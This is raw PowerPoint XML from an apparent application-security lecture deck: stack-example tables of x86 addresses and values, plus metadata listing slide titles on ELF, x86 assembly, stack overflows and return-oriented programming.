                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483bf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>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0xFFFFFFFF</a:t>
            </a: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0x00000000</a:t>
            </a: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extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1848080">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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2"/>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2b0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="378584">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1">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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048397</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx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,1),</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add $0x1,</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$0x28,0x4(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$0xa,(</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0x8048394</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048395</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048397</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804839a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804839d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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0x80483a5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483ab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483b3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483ba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483bf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="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0xfd2d4</a:t>
            </a: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0xfd2d0</a:t>
            </a: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0xfd2b8</a:t>
            </a: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0xfd2bc</a:t>
            </a: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0xfd2b4</a:t>
            </a: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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 2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43882864"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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25400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:headEnd type="none"/>
          <a:tailEnd type="triangl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152539</TotalTime>
  <Words>25446</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>9985</Paragraphs>
  <Slides>233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233</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="241" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Security</vt:lpstr>
      <vt:lpstr>Application Model</vt:lpstr>
      <vt:lpstr>Application Vulnerability Analysis</vt:lpstr>
      <vt:lpstr>Design Vulnerabilities</vt:lpstr>
      <vt:lpstr>Implementation Vulnerabilities</vt:lpstr>
      <vt:lpstr>Deployment Vulnerabilities</vt:lpstr>
      <vt:lpstr>Remote vs. Local Attacks </vt:lpstr>
      <vt:lpstr>The Life of an Application</vt:lpstr>
      <vt:lpstr>Interpretation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>The ELF File Format</vt:lpstr>
      <vt:lpstr>Typical ELF Sections</vt:lpstr>
      <vt:lpstr>The x86 CPU Family</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>x86 Registers</vt:lpstr>
      <vt:lpstr>Beware of the Endianess  (and of Signed Integers)!</vt:lpstr>
      <vt:lpstr>x86 Assembly Language</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Addressing Memory</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Invoking System Calls</vt:lpstr>
      <vt:lpstr>Hello World!</vt:lpstr>
      <vt:lpstr>Program Loading and Execution</vt:lpstr>
      <vt:lpstr>Process Memory Layout</vt:lpstr>
      <vt:lpstr>Process Structure</vt:lpstr>
      <vt:lpstr>Disassembling</vt:lpstr>
      <vt:lpstr>Radare</vt:lpstr>
      <vt:lpstr>IDA Pro</vt:lpstr>
      <vt:lpstr>Hopper</vt:lpstr>
      <vt:lpstr>Attacking UNIX Systems</vt:lpstr>
      <vt:lpstr>Attacking UNIX Applications</vt:lpstr>
      <vt:lpstr>Attack Classes</vt:lpstr>
      <vt:lpstr>File Access Attacks</vt:lpstr>
      <vt:lpstr>The Dot-Dot Attack</vt:lpstr>
      <vt:lpstr>PATH and HOME Attacks</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>A Simple Example</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>A Real Example: Shellshock</vt:lpstr>
      <vt:lpstr>Overflows/Overwrites</vt:lpstr>
      <vt:lpstr>The Stack</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Stack Example</vt:lpstr>
      <vt:lpstr>Function Frame</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</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Frames</vt:lpstr>
      <vt:lpstr>Calling Convention</vt:lpstr>
      <vt:lpstr>x86 Linux Calling Convention (cdecl)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Stack Overflows</vt:lpstr>
      <vt:lpstr>Implications of Cdecl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“Overflowing” Functions </vt:lpstr>
      <vt:lpstr>How to Exploit a Stack Overflow</vt:lpstr>
      <vt:lpstr>Shellcode Goal</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>Return-Oriented Programming</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ROP</vt:lpstr>
      <vt:lpstr>Building the ROP chain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ROP</vt:lpstr>
      <vt:lpstr>Application Security Research</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3278</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-20T16:48:30Z</dcterms:modified>
</cp:coreProperties>
</file>